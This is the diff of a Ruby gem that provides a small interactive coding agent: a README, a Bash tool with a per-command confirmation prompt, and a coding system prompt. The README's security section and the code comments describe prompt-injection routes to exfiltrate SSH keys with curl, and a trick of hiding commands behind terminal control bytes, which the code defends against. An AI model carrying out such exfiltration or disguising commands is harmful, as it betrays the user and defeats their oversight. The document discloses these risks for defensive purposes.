pikuri-code 0.0.3

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: e5c2e283890b53d73bb46cfdf5abc198c5a09a908f77b17265dd3ba64f61b12c
+  data.tar.gz: 59d87ce5b21e976cd1a1a6852fa80325eafbc17c5e224f7ba1aa8d6e17acefec
+SHA512:
+  metadata.gz: e16f07b2c46aca5cfc660153aa6ba857cf7ce6a3ba4f38e19f0986da16d1c4e0bd62fcba6fe38587a5dda5594c2fc18ec0086fd436e1b5122d2a57876f0a9f19
+  data.tar.gz: 5f3a42c1f84d033baaff24a2455615620007eca32c6bafc65868ead653a9495dfe4af0da11f712322a0a7abc92ac590277d65af42fd27f1ed4b9cfc475d05444

data/README.md

@@ -0,0 +1,96 @@
+# pikuri-code
+
+In-repo coding-agent gem for the
+[pikuri](https://codeberg.org/mvysny/pikuri) AI-assistant toolkit,
+in the spirit of Claude Code, opencode, or pi-code — but kept
+deliberately small so you can read the sources in an evening.
+
+Adds the shell-and-dev-loop layer on top of
+[`pikuri-workspace`](../pikuri-workspace/README.md)'s filesystem
+tools:
+- `Pikuri::Tool::Bash` — runs commands via the
+  `Pikuri::Subprocess.spawn` chokepoint with `Confirmer` gating.
+- `bin/pikuri-code` — the interactive coding-agent binary that
+  wires file + shell + web tools into an agent rooted at the
+  current working directory.
+
+Wire-by-wire it's the same `Pikuri::Agent` as `pikuri-chat`
+(from [`pikuri-core`](../pikuri-core/README.md)), with a different
+system prompt and a different toolset: `read`, `write`, `edit`,
+`grep`, `glob`, `bash`, plus the web tools and the calculator.
+Sub-agents are enabled, and any
+[Agent Skills](https://agentskills.io/specification) discovered
+under `.pikuri/skills`, `.claude/skills`, or `.agents/skills`
+(project or home) get exposed to the model on demand.
+
+## Install
+
+```ruby
+# Gemfile
+gem 'pikuri-code'
+```
+
+Pulls in `pikuri-core` + `pikuri-workspace` transitively.
+
+## Usage
+
+Run from the root of the repo you want it to work in:
+
+```sh
+cd ~/code/your-project
+/path/to/pikuri/pikuri-code/bin/pikuri-code
+```
+
+You'll land in a REPL — type a request at the `>` prompt, hit
+enter, and the agent will start reading files, running commands,
+and editing code to satisfy it. Ctrl+D (or Ctrl+C) exits. You
+can also pass an initial message on the command line:
+
+```sh
+/path/to/pikuri/pikuri-code/bin/pikuri-code "find the failing spec and fix it"
+```
+
+The first time the agent wants to write a file or run a shell
+command, it prompts you on the terminal (`(y/n)?`). Read what
+it's about to do before you say yes. If an `AGENTS.md` or
+`CLAUDE.md` exists at the workspace root, it's prepended to the
+system prompt as project context.
+
+## Security: this is a tech demo, treat it accordingly
+
+**Do not run `pikuri-code` against a sensitive checkout on a
+machine that holds secrets you care about.** It is a working demo
+of the coding-agent shape, *not* a hardened tool. The threat
+model has glaring holes:
+
+- **No sandbox.** The `bash` tool runs commands as your user,
+  with your environment, your `$HOME`, your `~/.ssh`, your shell
+  history, your browser cookies, your cloud CLI credentials —
+  all reachable. An LLM that's been prompt-injected (e.g. by a
+  malicious README it scraped, a poisoned dependency, or a
+  crafted file in the repo) can ask to run
+  `cat ~/.ssh/id_ed25519 | curl -X POST ...` and the only thing
+  standing between that and exfiltration is *you* reading the
+  confirmation prompt carefully. The workspace lock applies to
+  pikuri's own `read`/`write`/`edit`/`grep`/`glob` tools — it
+  does **not** apply to `bash`, which can `cat`, `cp`, `scp`,
+  `curl` anything the OS lets your user touch.
+- **`--yolo` auto-approves everything.** That flag exists for
+  use *inside* a disposable container or VM. Running `--yolo`
+  on your laptop is equivalent to handing the model a root
+  shell. Don't.
+- **Network tools fetch arbitrary URLs.** `web_search`,
+  `web_scrape`, and `fetch` are happy to pull whatever the
+  model asks for, and the content of those pages then becomes
+  part of the conversation — classic indirect prompt-injection
+  surface.
+- **No audit log of approved actions.** Once you approve a
+  `bash` command it runs; there's no separate record beyond
+  your scrollback.
+
+In short: run it inside a Docker container, a dev container, a
+VM, a fresh user account — anywhere you'd be fine with a stranger
+having a shell. The sandboxing story is a known gap and tracked
+as future work (see [`IDEAS.md`](../IDEAS.md)); until it lands,
+**assume the agent can do anything your user can do**, and
+approve prompts on that basis.

data/lib/pikuri/tool/bash.rb

@@ -0,0 +1,272 @@
+# frozen_string_literal: true
+
+require 'rainbow'
+
+module Pikuri
+  class Tool
+    # The +bash+ tool — run an arbitrary shell command in the workspace.
+    # Instantiating +Tool::Bash.new(workspace: ws, confirmer: c)+ produces
+    # a tool whose {Tool#to_ruby_llm_tool} wiring is identical to any
+    # bundled tool's. Same shape as {Tool::Write} (workspace + confirmer
+    # captured by the +execute+ closure at construction).
+    #
+    # == Confirmation
+    #
+    # Every command requires confirmation. Bash composes the full prompt
+    # (header line, +$ <command>+ echo, +(y/n)?+ cue) and hands it to the
+    # confirmer; the confirmer renders + parses the answer. The command
+    # echo passes through {.visible} which escapes control bytes so the
+    # model can't smuggle a +\r\033[2K rm -rf ~/+ behind the displayed
+    # text. Execution uses the raw command; only the *display* is
+    # sanitized.
+    #
+    # == Subprocess wiring
+    #
+    # The command runs through {Pikuri::Subprocess.spawn} with argv:
+    #
+    #   timeout --signal=TERM --kill-after=5s <timeout>s bash -c <command>
+    #
+    # +bash -c+ (no +-l+) — no profile/rc sourcing, no inherited login
+    # environment beyond what pikuri itself runs in. +timeout(1)+ from
+    # GNU coreutils handles the SIGTERM-then-SIGKILL race; we never use
+    # Ruby's +Timeout.timeout+ (can't reliably kill subprocesses). The
+    # +--kill-after=5s+ gives the command 5 seconds to handle SIGTERM
+    # cleanly before SIGKILL is sent.
+    #
+    # == Timeout detection
+    #
+    # GNU coreutils' +timeout+ exits +124+ after a successful SIGTERM,
+    # +137+ after escalating to SIGKILL. We treat both as "command timed
+    # out". A third code, +125+, is also accepted: uutils-coreutils 0.2.2
+    # (the Rust reimplementation shipped on some distros) sends the
+    # SIGTERM correctly but then mis-reports +125+ ("timeout itself
+    # failed") instead of +124+ whenever +--kill-after+ is in play. False-
+    # positive risk on real GNU coreutils is low — our argv is fixed and
+    # well-formed, so a +125+ there would indicate a misconfigured PATH
+    # rather than a routine timeout.
+    #
+    # Caveat: +137+ is ambiguous — a command killed by the OOM-killer
+    # also exits +137+. v1 accepts the mis-classification; the
+    # observation tells the user "sent SIGTERM, then SIGKILL" regardless.
+    #
+    # == Output handling
+    #
+    # Combined stdout+stderr (popen2e). Head+tail truncation at
+    # {OUTPUT_HEAD} + {OUTPUT_TAIL} bytes with a marker reporting both
+    # bytes-omitted and the original total — the model needs the scale
+    # to decide whether to re-run with +head+/+tail+/+grep+.
+    #
+    # == Backgrounded subprocesses
+    #
+    # Plain +cmd &+ does NOT detach — the backgrounded child inherits our
+    # combined-output pipe by default, so {Pikuri::Subprocess#wait} blocks
+    # on +io.read+ until the backgrounded process exits. The model must
+    # redirect fds away from our pipe to genuinely background:
+    # +cmd >/dev/null 2>&1 &+. Such commands stay in our pgroup and get
+    # SIGTERM on pikuri exit via {Pikuri::Subprocess.cleanup!}; +nohup+ /
+    # +setsid+ plus redirection opt out of cleanup.
+    #
+    # == Refusals
+    #
+    # All returned as +"Error: ..."+ observations:
+    #
+    # * Empty / whitespace-only +command+ → fast reject before confirming.
+    # * +timeout+ outside +[1, MAX_TIMEOUT]+ → bounds error.
+    # * User declined the confirmation → +"Error: user declined ..."+.
+    # * +timeout+ exit (+124+ / +137+) → timeout error with partial output.
+    class Bash < Tool
+      # Pikuri-convention per-module logger; the +Bash+ progname tags the
+      # construction-time warning below so it's clear in the shared
+      # +Pikuri.log_io+ stream which tool issued it.
+      # @return [Logger]
+      LOGGER = Pikuri.logger_for('Bash')
+
+      # @return [Integer] default value of the +timeout+ parameter (seconds).
+      DEFAULT_TIMEOUT = 120
+
+      # @return [Integer] hard upper bound on the +timeout+ parameter.
+      MAX_TIMEOUT = 600
+
+      # @return [String] grace period between SIGTERM and SIGKILL,
+      #   passed to +timeout --kill-after=...+.
+      KILL_AFTER = '5s'
+
+      # @return [Integer] bytes preserved from the start of the output
+      #   when the combined-output stream exceeds {OUTPUT_HEAD} + {OUTPUT_TAIL}.
+      OUTPUT_HEAD = 15 * 1024
+
+      # @return [Integer] bytes preserved from the end of the output.
+      OUTPUT_TAIL = 15 * 1024
+
+      # Description shown to the LLM. opencode-shape: summary + +Usage:+
+      # bullets. Per-parameter constraints (default, max) live in the
+      # parameter descriptions.
+      #
+      # @return [String]
+      DESCRIPTION = <<~DESC
+        Run a bash command in the workspace.
+
+        Usage:
+        - Use for tasks the dedicated tools can't do: git, tests, package managers, multi-step shell pipelines.
+        - Prefer `read` / `write` / `edit` / `grep` / `glob` over `cat` / `sed` / `rg` / `find` — they're workspace-resolved.
+        - Each call starts in the workspace root; there is no pwd persistence between calls. Use `cd /path && cmd` in one command.
+        - stdin is closed; interactive commands hang until timeout. Use non-interactive flags (`apt -y`, `git commit -m`).
+        - Plain `cmd &` does NOT detach — the backgrounded process inherits our output pipe and blocks. To genuinely background, redirect fds: `cmd >/dev/null 2>&1 &`. Add `nohup` or `setsid` to survive pikuri exit.
+        - Combined stdout+stderr is returned. Suppress either via `2>/dev/null` etc.
+        - Large outputs are head+tail-truncated. Pipe through `head`/`tail`/`grep`/`wc` to control volume.
+        - Non-zero exit status is a normal observation, not an error.
+        - The user must confirm every command before it runs; on rejection an Error is returned.
+      DESC
+
+      # @param workspace [Tool::Workspace] captured for +chdir+; commands
+      #   run in +workspace.cwd+. Bash does NOT path-resolve individual
+      #   arguments — the +command+ string is opaque shell syntax.
+      # @param confirmer [Tool::Confirmer] consulted before every command.
+      # @raise [RuntimeError] if +bash+ or +timeout+ aren't on +PATH+;
+      #   fail-loud at construction rather than the first tool call.
+      # @return [Bash]
+      def initialize(workspace:, confirmer:)
+        Bash.send(:check_binaries!)
+        # Prototype-stage capability advisory. The Bash tool runs commands
+        # with pikuri's own UID and inherits its filesystem view — there is
+        # no chroot, container, seccomp, or syscall filter today. Anything
+        # readable to the user is readable to the LLM via +cat ~/.ssh/id_*+
+        # / +aws configure list+ / etc. The per-command +Confirmer+ is the
+        # only line of defense; logged loud so anyone wiring this tool up
+        # sees the warning at startup, not on the day of an incident.
+        LOGGER.warn(
+          'Tool::Bash is a prototype: commands run unsandboxed under your UID and can read ' \
+          'sensitive files (~/.ssh, AWS credentials, browser sessions, ...). Use with care; ' \
+          'a future release will gate this behind a sandbox.'
+        )
+        super(
+          name: 'bash',
+          description: DESCRIPTION,
+          parameters: Parameters.build { |p|
+            p.required_string :command,
+                              'Bash command to execute. Multi-line is fine. ' \
+                              'Example: "ls -la lib/".'
+            p.optional_string :description,
+                              'Short 3-7 word label shown to the user alongside ' \
+                              'the command, e.g. "Run unit tests".'
+            p.optional_integer :timeout,
+                               "Timeout in seconds. Defaults to #{DEFAULT_TIMEOUT}, " \
+                               "max #{MAX_TIMEOUT}, e.g. 300."
+          },
+          execute: ->(command:, description: nil, timeout: DEFAULT_TIMEOUT) {
+            Bash.run(workspace: workspace, confirmer: confirmer,
+                     command: command, description: description, timeout: timeout)
+          }
+        )
+      end
+
+      # Bounds-check, confirm, spawn, and render the observation. Returns
+      # either +"$ ...\n<out>\n\nexit status: N"+ on a normal exit, or
+      # +"Error: ..."+ on rejection / timeout / bad inputs.
+      #
+      # @param workspace [Tool::Workspace]
+      # @param confirmer [Tool::Confirmer]
+      # @param command [String] raw command as supplied by the LLM
+      # @param description [String, nil] optional short label for the user
+      # @param timeout [Integer] seconds before SIGTERM is sent
+      # @return [String]
+      def self.run(workspace:, confirmer:, command:, description:, timeout:)
+        return 'Error: empty bash command.' if command.strip.empty?
+        return "Error: timeout must be >= 1, got #{timeout}" if timeout < 1
+        return "Error: timeout must be <= #{MAX_TIMEOUT}, got #{timeout}" if timeout > MAX_TIMEOUT
+
+        prompt = compose_prompt(command: command, description: description, timeout: timeout)
+        return 'Error: user declined the bash command.' unless confirmer.confirm?(prompt: prompt)
+
+        result = Pikuri::Subprocess.spawn(
+          'timeout', '--signal=TERM', "--kill-after=#{KILL_AFTER}", "#{timeout}s",
+          'bash', '-c', command,
+          chdir: workspace.cwd.to_s
+        ).wait
+
+        output = truncate(result.output)
+        exit_code = result.status.exitstatus
+
+        # 124 (GNU SIGTERM), 137 (GNU SIGKILL), 125 (uutils-coreutils
+        # 0.2.2 bug when --kill-after is set). See class header.
+        if exit_code == 124 || exit_code == 137 || exit_code == 125
+          "Error: command timed out after #{timeout}s (sent SIGTERM, then SIGKILL).\n\n" \
+            "$ #{visible(command)}\n#{output}"
+        else
+          "$ #{visible(command)}\n#{output}\n\nexit status: #{exit_code}"
+        end
+      end
+
+      # Compose the multi-line confirmation prompt. Three lines:
+      #
+      # 1. +OK to run bash[: <desc>][ \[Timeout: Ns\]]+ (bold)
+      # 2. +$ <visible(command)>+ (dim)
+      # 3. +(y/n)?+
+      #
+      # Colon after +bash+ is dropped when there's no description, since a
+      # trailing colon with nothing after it reads as broken. Timeout
+      # suffix appears only when non-default.
+      #
+      # @return [String]
+      def self.compose_prompt(command:, description:, timeout:)
+        header = +'OK to run bash'
+        desc_clean = description&.strip
+        header << ": #{desc_clean}" if desc_clean && !desc_clean.empty?
+        header << " [Timeout: #{timeout}s]" if timeout != DEFAULT_TIMEOUT
+
+        [
+          Rainbow(header).bold,
+          Rainbow("$ #{visible(command)}").dimgray,
+          '(y/n)?'
+        ].join("\n")
+      end
+      private_class_method :compose_prompt
+
+      # Escape control bytes for safe display while preserving +\n+
+      # (multi-line shell commands are normal). Catches +\r+, +\x1b+
+      # (ESC, the ANSI introducer), +\b+, NUL, DEL, etc. — without this,
+      # a model could craft +command: "\rrm -rf ~/"+ that visually
+      # overwrites the echo line after the user has already read it.
+      #
+      # @param command [String]
+      # @return [String]
+      def self.visible(command)
+        command.gsub(/[\x00-\x09\x0b-\x1f\x7f]/) { |c| format('\\x%02x', c.ord) }
+      end
+      private_class_method :visible
+
+      # Head+tail-truncate +output+ to {OUTPUT_HEAD} + {OUTPUT_TAIL}
+      # bytes with a marker reporting both bytes-omitted and total.
+      # No-op when the output already fits.
+      #
+      # @param output [String]
+      # @return [String]
+      def self.truncate(output)
+        total = output.bytesize
+        return output if total <= OUTPUT_HEAD + OUTPUT_TAIL
+
+        omitted = total - (OUTPUT_HEAD + OUTPUT_TAIL)
+        head = output.byteslice(0, OUTPUT_HEAD)
+        tail = output.byteslice(total - OUTPUT_TAIL, OUTPUT_TAIL)
+        "#{head}\n... [#{omitted} bytes omitted; total was #{total} bytes] ...\n#{tail}"
+      end
+      private_class_method :truncate
+
+      # Verify +bash+ and GNU +timeout+ are reachable on +PATH+. Routed
+      # through {Pikuri::Subprocess.spawn} to honor the subprocess seam
+      # (no direct +system+ / +backtick+ in +lib/+). +bash+ missing
+      # surfaces as +Errno::ENOENT+ from +popen2e+; +timeout+ missing
+      # surfaces as a non-zero exit from +command -v+.
+      #
+      # @return [void]
+      # @raise [RuntimeError] if either binary is missing
+      def self.check_binaries!
+        result = Pikuri::Subprocess.spawn('bash', '-c', 'command -v timeout >/dev/null', chdir: '/').wait
+        raise "Tool::Bash requires GNU coreutils 'timeout' on PATH" unless result.status.success?
+      rescue Errno::ENOENT
+        raise "Tool::Bash requires 'bash' on PATH"
+      end
+      private_class_method :check_binaries!
+    end
+  end
+end

data/lib/pikuri-code.rb

@@ -0,0 +1,28 @@
+# frozen_string_literal: true
+
+require 'pikuri-core'
+require 'pikuri-workspace'
+
+# Entry file for the pikuri-code gem. After +require 'pikuri-code'+,
+# +Pikuri::Tool::Bash+ is defined and the gem's +prompts/+ directory
+# is appended to +Pikuri::PROMPT_DIRS+ so
+# +Pikuri.prompt(:'coding-system-prompt')+ resolves to the right
+# file regardless of which gem actually shipped it.
+#
+# Zeitwerk loader is mounted under +Pikuri::Tool+ rather than rooted
+# at this gem's lib/ — same trick pikuri-workspace uses to avoid
+# Zeitwerk redefining the +Pikuri::Tool+ class as an inferred
+# module. See pikuri-workspace/lib/pikuri-workspace.rb for the
+# rationale.
+Pikuri::PROMPT_DIRS << File.expand_path('../prompts', __dir__)
+
+module Pikuri
+  class Tool
+    LOADER_PIKURI_CODE = Zeitwerk::Loader.new
+    LOADER_PIKURI_CODE.tag = 'pikuri-code'
+    LOADER_PIKURI_CODE.push_dir(File.expand_path('pikuri/tool', __dir__), namespace: Pikuri::Tool)
+    LOADER_PIKURI_CODE.ignore(File.expand_path('pikuri-code.rb', __dir__))
+    LOADER_PIKURI_CODE.setup
+    LOADER_PIKURI_CODE.eager_load
+  end
+end

data/prompts/coding-system-prompt.txt

@@ -0,0 +1,28 @@
+You are an expert coding assistant who reads, edits, and runs code via tools to solve software engineering tasks.
+
+You operate on the local filesystem under a workspace directory. All file-touching tools resolve paths within that workspace; trying to escape returns an error. The `bash` and `write` tools may prompt the user for confirmation before running — if they decline, accept it and don't retry the same operation.
+
+You have access to tools described in the API's tool list. To call one, use the standard tool-call mechanism — do not write tool calls as text.
+
+If several next steps are independent (e.g. reading two unrelated files, or running unrelated checks), emit them as parallel tool calls in a single turn rather than one at a time.
+
+Choosing a tool:
+- File reading: `read` for a known path, `grep` to search file contents by pattern, `glob` to find files by name pattern. Do NOT use `bash` for these (no `cat`, `sed`, `awk`, `rg`, `find`) — the dedicated tools respect the workspace and produce cleaner output.
+- Editing: `edit` for surgical changes — its `old_string` argument must match exact bytes, so always `read` the target file first. Use `write` for new files, or for wholesale rewrites of existing files (which will prompt the user for confirmation).
+- Running things: `bash` for tests, builds, git, scripts, and other shell commands. Briefly explain non-trivial commands before running them.
+- Research: `web_search`, `web_scrape`, `fetch` for stack traces, library docs, current API references — prefer local source via `read` / `grep` when the information is already in the workspace. `sub_agent` to delegate research that would otherwise blow up your context (full-codebase audits, multi-page reading).
+- `calculator` for arithmetic beyond simple mental math.
+
+Working on code:
+- Look at neighboring files first — match the existing conventions, library choices, naming, and comment style.
+- Make the smallest change that does the job. Don't refactor, rename, or add features beyond what was asked.
+- If you're unsure how a piece of code is used, `grep` for its callers before editing it.
+- After a substantive change, run the project's tests or build if you can locate them (look at README, package.json, Cargo.toml, Makefile, build.gradle, Gemfile, etc.).
+- Don't add ceremonial comments. Match the surrounding code's commenting style.
+- NEVER commit, push, or open a PR unless the user explicitly asks.
+
+Other guidelines:
+- Don't repeat a tool call with identical arguments — re-read the previous observation instead.
+- On a tool error (observation starting with `Error:`): use the data you already have to continue if you can. If you can't, reply to the user that you weren't able to complete the task and briefly say why (e.g. "the test runner isn't on PATH", "the file is outside the workspace"). Do not retry the same call hoping for a different result, and do not loop on rephrased variants of the same failing call.
+- Reference code with `file_path:line_number` so the user can navigate (e.g. `lib/agent.rb:42`).
+- When the task is done, reply in plain text with no tool call — a short summary of what changed and any next steps the user should consider. That is how you finish.

metadata

@@ -0,0 +1,87 @@
+--- !ruby/object:Gem::Specification
+name: pikuri-code
+version: !ruby/object:Gem::Version
+  version: 0.0.3
+platform: ruby
+authors:
+- Martin Vysny
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2026-05-22 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: pikuri-core
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 0.0.3
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 0.0.3
+- !ruby/object:Gem::Dependency
+  name: pikuri-workspace
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 0.0.3
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 0.0.3
+description: |
+  pikuri-code adds the shell-and-dev-loop layer on top of
+  pikuri-workspace's filesystem tools: a +Pikuri::Tool::Bash+ that
+  runs commands via the +Pikuri::Subprocess+ chokepoint with
+  +Confirmer+ gating, plus the demo +bin/pikuri-code+ binary that
+  wires file + shell + web tools into an interactive coding agent
+  rooted at the current working directory. The +Pikuri.prompt+
+  search path picks up this gem's +prompts/coding-system-prompt.txt+
+  automatically on require.
+email:
+- martin@vysny.me
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- README.md
+- lib/pikuri-code.rb
+- lib/pikuri/tool/bash.rb
+- prompts/coding-system-prompt.txt
+homepage: https://codeberg.org/mvysny/pikuri
+licenses:
+- MIT
+metadata:
+  source_code_uri: https://codeberg.org/mvysny/pikuri/src/branch/master
+  changelog_uri: https://codeberg.org/mvysny/pikuri/src/branch/master/CHANGELOG.md
+  bug_tracker_uri: https://codeberg.org/mvysny/pikuri/issues
+  rubygems_mfa_required: 'true'
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '3.3'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.5.22
+signing_key:
+specification_version: 4
+summary: In-repo coding-agent shell tool (Bash) + pikuri-code binary.
+test_files: []